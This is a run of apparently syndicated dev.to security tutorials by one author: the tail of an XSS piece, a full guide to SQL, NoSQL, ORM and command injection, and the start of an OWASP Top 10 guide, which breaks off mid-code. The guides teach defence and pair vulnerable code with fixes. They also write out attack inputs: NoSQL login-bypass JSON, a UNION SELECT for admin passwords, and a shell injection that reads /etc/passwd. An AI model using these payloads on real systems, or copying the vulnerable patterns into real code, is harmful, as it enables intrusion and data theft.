Hands‑On Practice (Don’t Just Read) </h2> <ul> <li> <a href="https://portswigger.net/web-security/cross-site-scripting" rel="noopener noreferrer">PortSwigger XSS Labs</a> — Reflected, Stored, DOM, and advanced bypasses.</li> <li> <a href="https://owasp.org/www-project-juice-shop/" rel="noopener noreferrer">OWASP Juice Shop</a> — XSS challenges in a realistic web app.</li> <li> <a href="https://xss-game.appspot.com/" rel="noopener noreferrer">XSS Game (Google)</a> — Six fun levels for beginners.</li> </ul> <p>Remember: Use isolated Docker or VMs for testing. XSS payloads can still be destructive (e.g., stealing cookies, defacing pages).</p> <h2> Want More? </h2> <p>If you enjoyed this deep dive into XSS, check out my other articles:</p> <ul> <li> <a href="https://dev.to/mahdi0shamlou/injection-attacks-are-not-dead-sql-nosql-orm-and-command-injection-how-to-actually-fix-them-f89">Injection Attacks Are Not Dead: SQL, NoSQL, ORM, and Command Injection — How to Actually Fix Them</a> — The story that started it all.</li> <li> <a href="https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi">OWASP Top 10 for Developers (2026 Edition) — How to Actually Fix the Most Dangerous Web Vulnerabilities fixes.</a> — Full list with code </li> <li> <a href="https://dev.to/mahdi0shamlou/what-is-a-sandbox-how-to-safely-run-and-analyze-any-unknown-exe-2m30">What Is a Sandbox? How to Safely Run Any Unknown .exe </a> — Essential for security testing.</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flu8mb246y6sw6pciqnho.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flu8mb246y6sw6pciqnho.webp" alt="Mahdi Shamlou" width="800" height="1067"></a></p> <p>🔗 LinkedIn:<br> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a><br> 📱 Telegram:<br> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a><br> 📸 Instagram:<br> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p>Author: Mahdi Shamlou | مهدی شاملو</p> xss security webdev bugbounty Injection Attacks Are Not Dead: SQL, NoSQL, ORM, and Command Injection — How to Actually Fix Them (2026) | Mahdi Shamlou Mahdi SHamlou | مهدی شاملو Sun, 10 May 2026 10:03:53 +0000 https://dev.to/mahdi0shamlou/injection-attacks-are-not-dead-sql-nosql-orm-and-command-injection-how-to-actually-fix-them-f89 https://dev.to/mahdi0shamlou/injection-attacks-are-not-dead-sql-nosql-orm-and-command-injection-how-to-actually-fix-them-f89 <p><a href="https://dev.to/mahdi0shamlou">Mahdi Shamlou</a> here.</p> <blockquote> <p>“Mahdi, I finally launched my e‑commerce site. And don’t worry — I used MongoDB, so no SQL injection. You can’t hack it.”</p> </blockquote> <p>I laughed. Then I asked him to let me try.</p> <p>Within 10 minutes, I bypassed his login with a NoSQL injection and pulled out his entire user collection. His face went pale.</p> <p>Moral of the story: “No SQL” does NOT mean “no injection”. Injection is a whole class of attacks — SQL, NoSQL, ORM, command, LDAP, you name it. If you concatenate user input into any kind of query or system command, you’re likely vulnerable.</p> <p>In this guide, I’ll show you:</p> <ul> <li> How I hacked my friend’s NoSQL login (and how to fix it).</li> <li> Classic SQL injection — still alive and well.</li> <li> How even an ORM like SQLAlchemy can betray you if you misuse it.</li> <li> Command injection that gives attackers a shell on your server.</li> <li> Actual code fixes + tools to find these bugs automatically.</li> </ul> <p>Let’s dive in.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8qe7gs1d7l3n8imi664.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8qe7gs1d7l3n8imi664.png" alt="Mahdi Shamlou" width="800" height="640"></a></p> <h2> The Story: “But I Use NoSQL! (And Why That’s Not Enough) </h2> <p>My friend’s site had a simple login form like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code> <span class="c1">// Node.js + Express + MongoDB</span> <span class="nx">app</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/login</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">username</span><span class="p">,</span> <span class="nx">password</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">;</span> <span class="nx">db</span><span class="p">.</span><span class="nf">collection</span><span class="p">(</span><span class="dl">'</span><span class="s1">users</span><span class="dl">'</span><span class="p">).</span><span class="nf">findOne</span><span class="p">({</span> <span class="na">username</span><span class="p">:</span> <span class="nx">username</span><span class="p">,</span> <span class="na">password</span><span class="p">:</span> <span class="nx">password</span> <span class="p">},</span> <span class="p">(</span><span class="nx">err</span><span class="p">,</span> <span class="nx">user</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">user</span><span class="p">)</span> <span class="nx">res</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="dl">'</span><span class="s1">Logged in</span><span class="dl">'</span><span class="p">);</span> <span class="k">else</span> <span class="nx">res</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="dl">'</span><span class="s1">Invalid credentials</span><span class="dl">'</span><span class="p">);</span> <span class="p">});</span> <span class="p">});</span> </code></pre> </div> <p>He thought: “No SQL strings, no injection.</p> <p>I sent this JSON as the username:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"username"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"$ne"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"password"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"$ne"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>MongoDB interpreter turned it into:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code> <span class="nx">db</span><span class="p">.</span><span class="nx">users</span><span class="p">.</span><span class="nf">findOne</span><span class="p">({</span> <span class="na">username</span><span class="p">:</span> <span class="p">{</span> <span class="na">$ne</span><span class="p">:</span> <span class="kc">null</span> <span class="p">},</span> <span class="na">password</span><span class="p">:</span> <span class="p">{</span> <span class="na">$ne</span><span class="p">:</span> <span class="kc">null</span> <span class="p">}</span> <span class="p">})</span> </code></pre> </div> <p>That returns the first user — no password check needed. I was in.</p> <blockquote> <p>Lesson: Any system that interprets user input as a command (SQL, JavaScript, shell, etc.) can be injected. NoSQL is no exception.</p> </blockquote> <h2> A03: Injection (The Unified Monster) </h2> <p>OWASP ranks Injection as #3 in 2026 (and #1 in many earlier lists). The root cause is the same:</p> <blockquote> <p>Untrusted data is sent to an interpreter as part of a command or query.</p> </blockquote> <p>Check this : <a href="https://dev.toOWASP%20Top%2010%20for%20Developers%20(2026%20Edition)%20%E2%80%94%20How%20to%20Actually%20Fix%20the%20Most%20Dangerous%20Web%20Vulnerabilities">OWASP Top 10 for Developers (2026 Edition) — How to Actually Fix the Most Dangerous Web Vulnerabilities</a></p> <p>We’ll cover the most dangerous flavours.</p> <h2> 1. SQL Injection — The Old King </h2> <p>Still #1 in bug bounties.<br> Vulnerable Code (Python/Flask)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/user</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_user</span><span class="p">():</span> <span class="n">user_id</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">)</span> <span class="n">query</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">SELECT * FROM users WHERE id = </span><span class="si">{</span><span class="n">user_id</span><span class="si">}</span><span class="sh">"</span> <span class="c1"># 😱 </span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="n">query</span><span class="p">)</span> <span class="k">return</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchone</span><span class="p">()</span> </code></pre> </div> <p>Input: ?id=1 UNION SELECT username, password FROM admins --<br> The Fix — Parameterized Queries<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/user</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_user</span><span class="p">():</span> <span class="n">user_id</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">)</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT * FROM users WHERE id = %s</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">user_id</span><span class="p">,))</span> <span class="c1"># Or use an ORM (correctly!) </span></code></pre> </div> <blockquote> <p>Tool: sqlmap — automated detection and exploitation.</p> </blockquote> <h2> 2. NoSQL Injection — The Modern Trap </h2> <p>MongoDB, CouchDB, etc. are vulnerable when you pass user input directly into query objects.</p> <p>Vulnerable (Node.js + Mongoose)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">User</span><span class="p">.</span><span class="nf">findOne</span><span class="p">({</span> <span class="na">email</span><span class="p">:</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">email</span><span class="p">,</span> <span class="na">password</span><span class="p">:</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">password</span> <span class="p">});</span> </code></pre> </div> <p>Attackers send:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"$regex"</span><span class="p">:</span><span class="w"> </span><span class="s2">".*"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"password"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"$ne"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>That matches any email and a non‑empty password → login bypass.</p> <p>Even worse: $where clauses execute JavaScript.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Vulnerable</span> <span class="nx">User</span><span class="p">.</span><span class="nf">find</span><span class="p">({</span> <span class="na">$where</span><span class="p">:</span> <span class="s2">`this.name == '</span><span class="p">${</span><span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">name</span><span class="p">}</span><span class="s2">'`</span> <span class="p">});</span> <span class="c1">// Attacker: 'a'; sleep(5000); //</span> </code></pre> </div> <p>The Fix — Schema Validation + Type Casting<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code> <span class="c1">// Use Mongoose schemas with required types</span> <span class="kd">const</span> <span class="nx">userSchema</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Schema</span><span class="p">({</span> <span class="na">email</span><span class="p">:</span> <span class="p">{</span> <span class="na">type</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span> <span class="na">required</span><span class="p">:</span> <span class="kc">true</span> <span class="p">},</span> <span class="na">password</span><span class="p">:</span> <span class="p">{</span> <span class="na">type</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span> <span class="na">required</span><span class="p">:</span> <span class="kc">true</span> <span class="p">}</span> <span class="p">});</span> <span class="c1">// And sanitize operators</span> <span class="kd">function</span> <span class="nf">sanitizeNoSQL</span><span class="p">(</span><span class="nx">obj</span><span class="p">)</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="k">typeof</span> <span class="nx">obj</span> <span class="o">!==</span> <span class="dl">'</span><span class="s1">object</span><span class="dl">'</span><span class="p">)</span> <span class="k">return</span> <span class="nx">obj</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">unsafe</span> <span class="o">=</span> <span class="p">[</span><span class="dl">'</span><span class="s1">$where</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">$ne</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">$gt</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">$regex</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">$expr</span><span class="dl">'</span><span class="p">];</span> <span class="k">for </span><span class="p">(</span><span class="kd">let</span> <span class="nx">key</span> <span class="k">of</span> <span class="nx">unsafe</span><span class="p">)</span> <span class="k">if </span><span class="p">(</span><span class="nx">key</span> <span class="k">in</span> <span class="nx">obj</span><span class="p">)</span> <span class="k">delete</span> <span class="nx">obj</span><span class="p">[</span><span class="nx">key</span><span class="p">];</span> <span class="k">return</span> <span class="nx">obj</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// Then use it</span> <span class="kd">const</span> <span class="nx">query</span> <span class="o">=</span> <span class="nf">sanitizeNoSQL</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">);</span> <span class="nx">User</span><span class="p">.</span><span class="nf">findOne</span><span class="p">(</span><span class="nx">query</span><span class="p">);</span> </code></pre> </div> <p>Better yet: use an allowlist for fields and reject any input with $ or { operators.</p> <blockquote> <p>Tool: NoSQLMap — automated NoSQL injection</p> </blockquote> <h2> 3. ORM Injection — Yes, Even SQLAlchemy </h2> <p>ORMs (SQLAlchemy, Hibernate, Entity Framework) protect you if you use them correctly. But as soon as you write raw SQL or use unsafe methods, you’re back to square one.</p> <p>Vulnerable SQLAlchemy (Python)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">sqlalchemy</span> <span class="kn">import</span> <span class="n">text</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/search</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search</span><span class="p">():</span> <span class="n">keyword</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">q</span><span class="sh">'</span><span class="p">)</span> <span class="n">query</span> <span class="o">=</span> <span class="nf">text</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">SELECT * FROM products WHERE name LIKE </span><span class="sh">'</span><span class="s">%</span><span class="si">{</span><span class="n">keyword</span><span class="si">}</span><span class="s">%</span><span class="sh">'"</span><span class="p">)</span> <span class="n">results</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="n">query</span><span class="p">)</span> <span class="c1"># Ouch — raw string concatenation inside text() </span></code></pre> </div> <p>Attacker: ?q=' OR '1'='1' UNION SELECT ...</p> <p>Fix — Use ORM Parameters or Bind Variables<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Method 1: ORM safe filtering </span><span class="kn">from</span> <span class="n">sqlalchemy</span> <span class="kn">import</span> <span class="n">or_</span> <span class="n">products</span> <span class="o">=</span> <span class="n">Product</span><span class="p">.</span><span class="n">query</span><span class="p">.</span><span class="nf">filter</span><span class="p">(</span><span class="n">Product</span><span class="p">.</span><span class="n">name</span><span class="p">.</span><span class="nf">ilike</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">%</span><span class="si">{</span><span class="n">keyword</span><span class="si">}</span><span class="s">%</span><span class="sh">"</span><span class="p">)).</span><span class="nf">all</span><span class="p">()</span> <span class="c1"># Method 2: If you must use raw SQL, use bind params </span><span class="n">query</span> <span class="o">=</span> <span class="nf">text</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT * FROM products WHERE name LIKE :kw</span><span class="sh">"</span><span class="p">)</span> <span class="n">results</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="n">query</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">kw</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="s">%</span><span class="si">{</span><span class="n">keyword</span><span class="si">}</span><span class="s">%</span><span class="sh">"</span><span class="p">})</span> </code></pre> </div> <p>Rule: Never use text() with f‑strings or string concatenation. Always pass parameters as a dict or tuple.</p> <blockquote> <p>Tool: SQLAlchemy’s own logging — watch for generated queries with suspicious input.</p> </blockquote> <h2> 4. Command Injection — Full Server Takeover </h2> <p>When your app calls operating system commands with user input, the attacker can run any command.<br> Vulnerable (Python)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">subprocess</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/ping</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">ping</span><span class="p">():</span> <span class="n">ip</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">ip</span><span class="sh">'</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">check_output</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">ping -c 4 </span><span class="si">{</span><span class="n">ip</span><span class="si">}</span><span class="sh">"</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="k">return</span> <span class="n">result</span> </code></pre> </div> <p>Attacker: ?ip=8.8.8.8; cat /etc/passwd<br> Fix — Use Native APIs, Avoid Shell=True<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">shlex</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/ping</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">ping</span><span class="p">():</span> <span class="n">ip</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">ip</span><span class="sh">'</span><span class="p">)</span> <span class="c1"># Allowlist allowed characters </span> <span class="k">if</span> <span class="ow">not</span> <span class="n">re</span><span class="p">.</span><span class="nf">match</span><span class="p">(</span><span class="sa">r</span><span class="sh">'</span><span class="s">^[\d\.]+$</span><span class="sh">'</span><span class="p">,</span> <span class="n">ip</span><span class="p">):</span> <span class="nf">abort</span><span class="p">(</span><span class="mi">400</span><span class="p">)</span> <span class="c1"># Use list form + no shell </span> <span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">check_output</span><span class="p">([</span><span class="sh">"</span><span class="s">ping</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">-c</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">4</span><span class="sh">"</span><span class="p">,</span> <span class="n">ip</span><span class="p">])</span> <span class="k">return</span> <span class="n">result</span> </code></pre> </div> <p>Even better: Don’t call system commands at all — use native network libraries (e.g., ping3 for Python).</p> <blockquote> <p>Tool: Commix — automated command injection.</p> </blockquote> <h2> Injection Prevention — A Unified Checklist </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Injection Type</th> <th>Prevention Strategy</th> </tr> </thead> <tbody> <tr> <td><strong>SQL</strong></td> <td>Parameterized queries / prepared statements (never concatenation).</td> </tr> <tr> <td><strong>NoSQL</strong></td> <td>Validate input types, reject operator keys (<code>$</code>), use schema validation.</td> </tr> <tr> <td><strong>ORM</strong></td> <td>Avoid raw SQL; use ORM’s safe methods; parameterize any <code>text()</code> call.</td> </tr> <tr> <td><strong>Command</strong></td> <td>Use native APIs, avoid <code>shell=True</code>, allowlist inputs.</td> </tr> <tr> <td><strong>LDAP</strong></td> <td>Escape special characters (<code>*</code>, <code>(</code>, <code>)</code>, <code>\</code>).</td> </tr> <tr> <td><strong>XML/XPath</strong></td> <td>Disable external entities, use hard‑coded XPaths.</td> </tr> </tbody> </table></div> <h3> Universal Rules </h3> <ol> <li> <strong>Treat all user input as dangerous.</strong> </li> <li> <strong>Use allowlists</strong> (e.g., <code>re.match(r'^[a-z0-9]+$', input)</code>). </li> <li> <strong>Prefer safe APIs</strong> — ORMs, parameterised queries, native libraries. </li> <li> <strong>Never trust “I don’t use SQL”</strong> — injection is about <em>interpreters</em>, not just SQL.</li> </ol> <h2> Tools to Find Injection Flaws Automatically </h2> <p>Run these before an attacker does:</p> <ul> <li> <strong>sqlmap</strong> — SQL injection detection &amp; exploitation. </li> <li> <strong>NoSQLMap</strong> — NoSQL injection (MongoDB, CouchDB). </li> <li> <strong>Commix</strong> — Command injection. </li> <li> <strong>Burp Suite Scanner</strong> — All kinds of injection (paid but worth it). </li> <li> <strong>OWASP ZAP</strong> — Free, includes injection tests. </li> <li> <strong>Semgrep</strong> or <strong>CodeQL</strong> — Find injection patterns in your source code.</li> </ul> <h2> Hands‑On Practice (Don’t Just Read) </h2> <p>You learn injection by doing it (safely).</p> <ul> <li> <a href="https://portswigger.net/web-security/nosql-injection" rel="noopener noreferrer">PortSwigger NoSQL injection labs</a> </li> <li> <a href="https://owasp.org/www-project-juice-shop/" rel="noopener noreferrer">OWASP Juice Shop</a> — has both SQL and NoSQL challenges. </li> <li> <a href="https://tryhackme.com/room/injection" rel="noopener noreferrer">TryHackMe – Injection room</a> </li> </ul> <p><strong>Remember my sandbox advice from last article:</strong> Run all vulnerable apps inside isolated VMs or Docker containers. Even your own testing can go wrong.</p> <h2> Want More? </h2> <p>If you enjoyed this deep dive into injection attacks, check out:</p> <ul> <li> <a href="https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi">OWASP Top 10 for Developers (2026 Edition)</a> — full list with fixes. </li> <li> <a href="https://dev.to/mahdi0shamlou/what-is-a-sandbox-how-to-safely-run-and-analyze-any-unknown-exe-2m30">What Is a Sandbox? How to Safely Run Any Unknown .exe</a> — dynamic malware analysis.</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fynkx482sihl7viur6p97.jpeg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fynkx482sihl7viur6p97.jpeg" alt="Mahdi Shamlou" width="800" height="1067"></a></p> <p>🔗 LinkedIn:<br> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a><br> 📱 Telegram:<br> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a><br> 📸 Instagram:<br> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p><em>Author: Mahdi Shamlou | مهدی شاملو</em></p> sql nosql security injection OWASP Top 10 for Developers (2026 Edition) — How to Actually Fix the Most Dangerous Web Vulnerabilities | Mahdi Shamlou Mahdi SHamlou | مهدی شاملو Sun, 10 May 2026 09:27:12 +0000 https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi <p>Hi, <a href="https://dev.to/mahdi0shamlou">Mahdi Shamlou</a> here. In my last article (<a href="https://dev.to/mahdi0shamlou/what-is-a-sandbox-how-to-safely-run-and-analyze-any-unknown-exe-2m30">What Is a Sandbox? How to Safely Run and Analyze Any Unknown .exe</a>), you learned how to safely detonate an unknown .exe in a sandbox. That’s reactive security — analyzing malware after it exists.</p> <p>But what if you could prevent most attacks before they ever reach your server? That’s where OWASP comes in.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3shrnwqybphv9h48frui.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3shrnwqybphv9h48frui.png" alt="Mahdi Shamlou" width="800" height="245"></a></p> <p>In this guide, I’ll walk you through the OWASP Top 10 for 2026 — but not as a boring list. I’ll show you:</p> <ul> <li> What each vulnerability actually means for your code.</li> <li> A real vulnerable code snippet (and how to fix it).</li> <li> Which tools you can use to find these bugs automatically.</li> </ul> <p>By the end, you’ll have a security checklist you can apply to your next web app.</p> <h2> What Is OWASP? (And Why You, as a Developer, Should Care) </h2> <p>OWASP = Open Web Application Security Project. It’s a non‑profit community that produces free, world‑class security guidance.</p> <p>The most famous is the OWASP Top 10 — a ranked list of the most critical web security risks. It’s updated every few years to reflect real‑world attack data. The 2026 edition (which builds on the 2021 version) remains the must‑know list for any web developer.</p> <p>Why should you care? Because:</p> <ul> <li> 75% of web apps have at least one Top 10 vulnerability.</li> <li> Fixing a bug in production costs 30x more than catching it in coding.</li> <li> Security is now a shared responsibility — developers can’t just throw code over the wall to a “security team”.</li> </ul> <p>So let’s dive in. I’ll present each risk, show you a bad code example, and then give you the secure version.</p> <h2> A01: Broken Access Control </h2> <p>What it is: Users can see or edit data they’re not supposed to. For example, a normal user changing their ?user_id=123 to ?user_id=124 and seeing someone else’s profile.</p> <p>Vulnerable code (Flask):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/profile</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">profile</span><span class="p">():</span> <span class="n">user_id</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">user_id</span><span class="sh">'</span><span class="p">)</span> <span class="c1"># No check if logged-in user owns this ID </span> <span class="n">user</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">SELECT * FROM users WHERE id = </span><span class="si">{</span><span class="n">user_id</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">'</span><span class="s">profile.html</span><span class="sh">'</span><span class="p">,</span> <span class="n">user</span><span class="o">=</span><span class="n">user</span><span class="p">)</span> </code></pre> </div> <p>Fix — enforce server‑side access control:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/profile</span><span class="sh">'</span><span class="p">)</span> <span class="nd">@login_required</span> <span class="k">def</span> <span class="nf">profile</span><span class="p">():</span> <span class="c1"># Only allow access to the currently logged-in user's own profile </span> <span class="n">user_id</span> <span class="o">=</span> <span class="n">current_user</span><span class="p">.</span><span class="nb">id</span> <span class="c1"># from session, not from request </span> <span class="n">user</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT * FROM users WHERE id = %s</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">user_id</span><span class="p">,))</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">'</span><span class="s">profile.html</span><span class="sh">'</span><span class="p">,</span> <span class="n">user</span><span class="o">=</span><span class="n">user</span><span class="p">)</span> </code></pre> </div> <blockquote> <p>Tool to catch this: OWASP ZAP or Burp Suite — try changing ID parameters manually.</p> </blockquote> <h2> A02: Cryptographic Failures </h2> <p>What it is: Sensitive data (passwords, credit cards) transmitted or stored without proper encryption. That includes using old algorithms like MD5 or SHA‑1.</p> <p>Vulnerable code:<br> </p> <div class="highlight js-code-highlight"> 